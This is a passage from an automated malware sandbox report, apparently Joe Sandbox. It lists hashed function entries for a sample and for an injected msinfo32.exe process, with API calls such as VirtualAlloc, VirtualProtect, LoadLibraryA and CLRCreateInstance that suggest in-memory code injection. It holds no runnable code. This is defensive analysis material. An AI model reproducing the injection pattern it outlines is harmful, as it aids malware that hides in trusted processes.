Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: f3ec12f973aa7cf4e75c3929683b614d4c4d39391952d161ed26913664bec971
Instruction ID: bd53d71a2be135c81a1bafdb3420563ba97d84f4016eb429b9af4d9207eddc71
Opcode Fuzzy Hash: f3ec12f973aa7cf4e75c3929683b614d4c4d39391952d161ed26913664bec971
Instruction Fuzzy Hash: E0F03663954E8482D202DF1CE8003AB7330FB9E799F255316EF8D26615DF24D5929700

Function 002D3080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 002D3060

Strings

Argument domain error (DOMAIN), xrefs: 002D3080
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 82134d2a7ad93922ea0405daf0d0061b6a33d68d841de9a353900d2f2207178a
Instruction ID: e16fecdf5ac678afa86d3a9923a7b9596d2d58fae056c566524fb34e7aa0de2f
Opcode Fuzzy Hash: 82134d2a7ad93922ea0405daf0d0061b6a33d68d841de9a353900d2f2207178a
Instruction Fuzzy Hash: 0DF03663954E8482D202DF1CE8003AB7330FB9E799F255316EF8D26615DF24D5929700

Function 002D3090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 002D3060

Strings

Partial loss of significance (PLOSS), xrefs: 002D3090
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 0805a3fd793d26a0c09f0371b15b1c3b584f32a0e7933bd3964dc1db9ec1b28e
Instruction ID: a6120cf6adda97ab2d839e91b7733dc62b413b5919ada86f223f50f29ce2f149
Opcode Fuzzy Hash: 0805a3fd793d26a0c09f0371b15b1c3b584f32a0e7933bd3964dc1db9ec1b28e
Instruction Fuzzy Hash: 4FF03663958E8482D202DF1CE8003AB7334FB9E799F255316EF8D26615DF24D5929700

Function 002D30C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 002D3060

Strings

Total loss of significance (TLOSS), xrefs: 002D30C0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 914eb782db936fefd1f06460bd4ac75e18b14d65258d685af9434b455c5f5f43
Instruction ID: df7c78c06200a2a9a298ee6633b5b4ac9e44bf8c158f3410bb5f8ba06cd2c8c3
Opcode Fuzzy Hash: 914eb782db936fefd1f06460bd4ac75e18b14d65258d685af9434b455c5f5f43
Instruction Fuzzy Hash: FFF01262954E8482D2029F1CE8003AB7330FB9E799F255316EF8D26615DF24D5D29700

Function 002D3018 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 002D3060

Strings

Argument singularity (SIGN), xrefs: 002D3018
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: ca64cc9f4f7eb160ca42a0b23225f9733fbf845813cc3885a9564dba407b4eab
Instruction ID: c0aaa9fb1a08d00b157357c4a17542fd14cfe47c8b5dc448605f6b6e91c6070b
Opcode Fuzzy Hash: ca64cc9f4f7eb160ca42a0b23225f9733fbf845813cc3885a9564dba407b4eab
Instruction Fuzzy Hash: B0F03062954E8882D302DF1CE8003AB7330FB9E799F255316EF8D2A615DF24D5928700

Analysis Process: msinfo32.exePID: 7012, Parent PID: 6872COMMON

Execution Graph

Execution Coverage:	16.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	88
Total number of Limit Nodes:	5

Executed Functions

Function 000001AA1102119C Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 000001AA1102120F

Memory Dump Source

Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction ID: 29225a52655ad5b157222ba98cef34e4dec4bb895dc519a426cca943b915cf4f
Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction Fuzzy Hash: 50C1D830B55B056BEBD8EA28C4917E9B3D9FF4A300F94416DD84AC3186DB38F902C683

Function 00007FFD9B890EFA Relevance: 1.6, Strings: 1, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3C_^, xrefs: 00007FFD9B891101

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID: 3C_^
API String ID: 0-16156322
Opcode ID: f7994c2a565a72a3b7187d8e7170cb41405ece9f708a03134d81cea5b646cb3e
Instruction ID: 1ebc05f6cfae94a2bf637c156ca22d92ed1556645795efe673988711ff2c0480
Opcode Fuzzy Hash: f7994c2a565a72a3b7187d8e7170cb41405ece9f708a03134d81cea5b646cb3e
Instruction Fuzzy Hash: E2A14B57F0F6DA2FFB22ABB858760E97F50EF4526070940F7D4988B0E7DD18A9498350

Function 00007FFD9B895CE6 Relevance: .5, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04687290af5635f9e7d6dbb2ce68db51a36e5ca2cf0b9bed870b5408a49a0a6
Instruction ID: a1baa1e409a29f9a24cceba30c1601307996bd3e572ee8f549df986db1e93647
Opcode Fuzzy Hash: f04687290af5635f9e7d6dbb2ce68db51a36e5ca2cf0b9bed870b5408a49a0a6
Instruction Fuzzy Hash: B5F1A730609A8D8FEFA8DF28C855BE97BE1FF58310F04426EE85DC7295DB3499458B81

Function 00007FFD9B896A92 Relevance: .5, Instructions: 456
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 709e83757a98288041685c1906fad9a06d090676df0af9d4d8947482fa55d486
Instruction ID: aebf0a268f32b388ef86bfc9d022a1ecddbbe7a4cc906453d015e2e99270c1d2
Opcode Fuzzy Hash: 709e83757a98288041685c1906fad9a06d090676df0af9d4d8947482fa55d486
Instruction Fuzzy Hash: E8E1D570A08A8D8FEFA8DF28C8557E97BD1FF58350F14426EE85DC7295CB7499408781

Function 000001AA11020104 Relevance: 6.1, APIs: 4, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001AA110229B4: LoadLibraryA.KERNEL32 ref: 000001AA11022A82

VirtualProtect.KERNEL32 ref: 000001AA11020180
VirtualProtect.KERNEL32(?,?,-00000001,00000001,-00000001,00000001,-00000001,000001AA110213AE), ref: 000001AA110201A9
VirtualProtect.KERNEL32 ref: 000001AA110201EE
VirtualProtect.KERNEL32 ref: 000001AA11020212

Memory Dump Source

Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction ID: 15632717179bd6940e86a1a6c507d29fa8e15dbf7223345391a87a226243ab53
Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction Fuzzy Hash: 0531983174CB084FD798EE1898457A9B3DAEBC9720F50056EA84FC31CADE64ED0686C3

Function 000001AA11020173 Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 000001AA11020180
VirtualProtect.KERNEL32(?,?,-00000001,00000001,-00000001,00000001,-00000001,000001AA110213AE), ref: 000001AA110201A9
VirtualProtect.KERNEL32 ref: 000001AA110201EE
VirtualProtect.KERNEL32 ref: 000001AA11020212

Memory Dump Source

Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction ID: 5ad799e95ae1f610757a5b27cdd0369412838ef8ae6a798a825b0edfb4b10337
Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction Fuzzy Hash: 0021693174C7084BDB98E95CA855399B3D6EBC9710F50055EEC4FC32CADE64ED068683

Function 000001AA11020F28 Relevance: 4.8, APIs: 3, Instructions: 257
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 000001AA11020F74
SysAllocString.OLEAUT32 ref: 000001AA11021090
SafeArrayDestroy.OLEAUT32 ref: 000001AA11021174

Memory Dump Source

Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction ID: 012da2c86111752136fa79f51f78b3a8c59e51bbb332892a33bc8b2d7ebbcd13
Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction Fuzzy Hash: 46819E34718B089FD7A8EF28C889BA6B7E4FF99301F50462D948AC7191DB34F505CB82

Function 000001AA110229B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 000001AA11022A82

Strings

l, xrefs: 000001AA11022A1C

Memory Dump Source

Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: ab8a8b0923e2793841a82b212f11cf8039ed24899fe19a9f464bf2987918310f
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: 1331D430A59B854FE795DB2CC044766BBD9FFAA308F6446ACC0CAC7192D724D846C703

Function 000001AA11020230 Relevance: 3.1, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001AA110229B4: LoadLibraryA.KERNEL32 ref: 000001AA11022A82

VirtualProtect.KERNEL32 ref: 000001AA1102027E
VirtualProtect.KERNEL32 ref: 000001AA110202A6

Memory Dump Source

Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction ID: d177b2e373750e6390818f0d434dd7d6d290fa1b173a9c80a06db6ad59063125
Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction Fuzzy Hash: 9411A531758B085BDBD4EB1898857AA73E5FFD9300F40056EAC4AC7289DE24ED45C783

Function 00007FFD9B890E85 Relevance: 1.4, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

VG_H, xrefs: 00007FFD9B89796E

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID: VG_H
API String ID: 0-4292058142
Opcode ID: 64a67d5a08541ed6e2cf52501f57f73206ddfada8f3cf943b6290fa7ffe5eb2f
Instruction ID: 3bf4d3a0111248e721e205e774fa55ee4a6f66129b2e0dcb0e48547f31e59711
Opcode Fuzzy Hash: 64a67d5a08541ed6e2cf52501f57f73206ddfada8f3cf943b6290fa7ffe5eb2f
Instruction Fuzzy Hash: 9A313975B0A94D5FEF94EBB844696B97BE1EF8D310B0900BAD409D72A2DE289D418740

Function 00007FFD9B897465 Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFD9B8974D3

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: c756afeed83f5f1828d4922a0917a71009bd1374e25d63b75a003f24a1e2d140
Instruction ID: 9dc0b28a6258343d39a457ef01c80f27386705bf29264d1ae78d7b7829e28134
Opcode Fuzzy Hash: c756afeed83f5f1828d4922a0917a71009bd1374e25d63b75a003f24a1e2d140
Instruction Fuzzy Hash: BE21F331D0D29A8FDF529BA4C8155E9BFF0EF4A310F0601BBD49ED71A2CB28954487A1

Function 00007FFD9B892010 Relevance: 1.3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFD9B8974D3

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: ce9c7fc1f72e4fdb091ab7bdaceb466654d0dca679109e57490e6d0ccffd5bbb
Instruction ID: 7f7f9878e2a7857ee9bdbc953f18884bd6a3816a6b58af2a145ba05ecd62ba52
Opcode Fuzzy Hash: ce9c7fc1f72e4fdb091ab7bdaceb466654d0dca679109e57490e6d0ccffd5bbb
Instruction Fuzzy Hash: C8119B75E0951E8AEF64ABE4C4156FDBEA0EF4C314F02053AD91EE31E1DF39A6404791

Function 00007FFD9B897C25 Relevance: .8, Instructions: 787
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89363bce84953228bc87d9d513ea74dffc79aff1d34174c7b68bf7adbecdd93c
Instruction ID: 1b3788a03aeb71c94570fb238950632619c8ed655e838411771f58b14b252ebb
Opcode Fuzzy Hash: 89363bce84953228bc87d9d513ea74dffc79aff1d34174c7b68bf7adbecdd93c
Instruction Fuzzy Hash: A4816336A0D68E4FEB55DBA898656F87FB0EF9A310F0540BBD059C70E3DE282945CB11

Function 00007FFD9B890E58 Relevance: .4, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8963eda83297f42823005ee83aedc1c5cd48cd03df69290ba92cda445f2c70b
Instruction ID: 0b12b69a9a71d11dfab84152b2454307a8e7c7295af3ddfc0bcc40ffc28a665e
Opcode Fuzzy Hash: b8963eda83297f42823005ee83aedc1c5cd48cd03df69290ba92cda445f2c70b
Instruction Fuzzy Hash: 0CC17B31B0EA491FEB99EB7C84656BC7BD1EF99350B0505BED04AC72E6DE286C428740

Function 00007FFD9B897CA0 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff8ac9cf09d7be91f1a54667ee9b61129fa731d768015fe33ecd0b4e8f3218b
Instruction ID: 9d3369bd989eb5d63426f587508a55a1920069245d17e2e8f8fc14519ad78ea2
Opcode Fuzzy Hash: 1ff8ac9cf09d7be91f1a54667ee9b61129fa731d768015fe33ecd0b4e8f3218b
Instruction Fuzzy Hash: 7F412D36A0D7895FE751D7B898711E87FB1EF8A260F0500F7D459CB0E3DD1829468B21

Function 00007FFD9B891B29 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63a5baed2bf19e737da27e875e3433e117e1ecf4fdea3206978ef322c7dcfb55
Instruction ID: da1a6ca58f105e79f0ec498a73b284de2f6652d1d8e660eb24c2a6260cc273be
Opcode Fuzzy Hash: 63a5baed2bf19e737da27e875e3433e117e1ecf4fdea3206978ef322c7dcfb55
Instruction Fuzzy Hash: 6FC17C31B0EB891FEB59EB7C84656A87FD1EF99210B0505FED08AC72E6DD285C468740

Function 00007FFD9B8966A6 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 190a4a9cc1b61acf698fc74b2c3b877df8945d09ad7124cca83958d54ac27347
Instruction ID: c963bae0af05bfeb4e00f3b76266639c3fbb4a1cd01fb15b370f6ea46ae6712d
Opcode Fuzzy Hash: 190a4a9cc1b61acf698fc74b2c3b877df8945d09ad7124cca83958d54ac27347
Instruction Fuzzy Hash: FCB1C670609A8D8FDF69DF28C8557E93BE1FF59350F04426EE84DC7292CA349945CB82

Function 00007FFD9B890E98 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 191484321d08023c2254fd32237ae85e278c66a0915d781578055cec278fec99
Instruction ID: c2c9052e635984eefea7bdaa86ada7e19762e966e801df9a7f181843dcaaf024
Opcode Fuzzy Hash: 191484321d08023c2254fd32237ae85e278c66a0915d781578055cec278fec99
Instruction Fuzzy Hash: AF716730F0EA4F4FEB65E7B848616A67FD0EF49350F4501BAD449C71E6D92CA84B8781

Function 00007FFD9B8985F0 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa5d0ccf8ef42facbbabeb28916241e9100f947d314ff5277c21153245e14778
Instruction ID: a48ec75ca2c2c0b15bd33d374062e1d70da6648d6c09464f2c36cd54d98134f2
Opcode Fuzzy Hash: aa5d0ccf8ef42facbbabeb28916241e9100f947d314ff5277c21153245e14778
Instruction Fuzzy Hash: 5E710A31B1DA4D4FDB95EB788469BAD7BE1EF88350F05057DD00ED72A2CE68AC428B41

Function 00007FFD9B89151D Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7880793f23fb5e18e26c7c91d93bbf4e2ae064ee6fb5e98448036101f0a67e9
Instruction ID: 1428c41e79d4c95933e7fffcc937caedcbbbc7bd0e37c745b21425b90fb39b82
Opcode Fuzzy Hash: c7880793f23fb5e18e26c7c91d93bbf4e2ae064ee6fb5e98448036101f0a67e9
Instruction Fuzzy Hash: 2781C830A0E7499FDB56EBB8C85A7997FF0EF5A310F0500FED44AC71A2DA689845CB41

Function 00007FFD9B8985EC Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2558bdff2749c04a7645adc36f9a9652dd91ddaf88f8c8be4928c837fb1b947f
Instruction ID: 44a5d2011834841459981ad4ee7e1fad6e870bd842188acadffed60d2b4c4c33
Opcode Fuzzy Hash: 2558bdff2749c04a7645adc36f9a9652dd91ddaf88f8c8be4928c837fb1b947f
Instruction Fuzzy Hash: DE611B31B1DA4D4FDBA5EBB88469BAD7BE1EF88350F05057ED00ED71A2CD68AC418B41

Function 00007FFD9B89754D Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6090f9d1ec88958582069313341f23bca11f9beaf171997eb0002d6fb9ed43a
Instruction ID: 2e5384ecb14b4fd7fee83d040b1794f23c2a12a5598381d847bc78c50ca977b0
Opcode Fuzzy Hash: c6090f9d1ec88958582069313341f23bca11f9beaf171997eb0002d6fb9ed43a
Instruction Fuzzy Hash: FB51A530A18A4C8FDB58DF58D855BEDBBF1FF99310F1042AAD44DD3296CA34A942CB81

Function 00007FFD9B891878 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8b0760e7deeb57336ba4642012637ffbe3148b85b9870b28be1483066d5ca39
Instruction ID: 45502aa24f2abeaacc2811a78f0981996dbd7aa056f14d173418dde9074e989a
Opcode Fuzzy Hash: e8b0760e7deeb57336ba4642012637ffbe3148b85b9870b28be1483066d5ca39
Instruction Fuzzy Hash: A1513B30A0E68A5FEB1BA77448616A97FE0EF4A310F1902F9D099C71E7CE6C6842C751

Function 00007FFD9B8935DC Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
